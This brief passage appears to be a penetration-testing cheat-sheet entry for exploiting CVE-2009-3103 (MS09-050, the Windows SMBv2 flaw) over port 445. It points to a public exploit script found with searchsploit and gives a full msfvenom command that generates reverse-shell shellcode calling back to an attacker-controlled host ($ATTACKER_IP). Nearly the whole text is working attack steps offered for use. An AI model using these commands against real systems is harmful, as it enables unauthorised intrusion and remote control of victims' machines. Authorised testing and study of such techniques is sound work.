CVE2009-3103

Ensure port 445 is open for this to work

searchsploit MS09-050
exploits/windows/remote/40280.py

Shellcode

msfvenom -p windows/shell_reverse_tcp \
    -f python -v shell \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT EXITFUNC=thread 

Last updated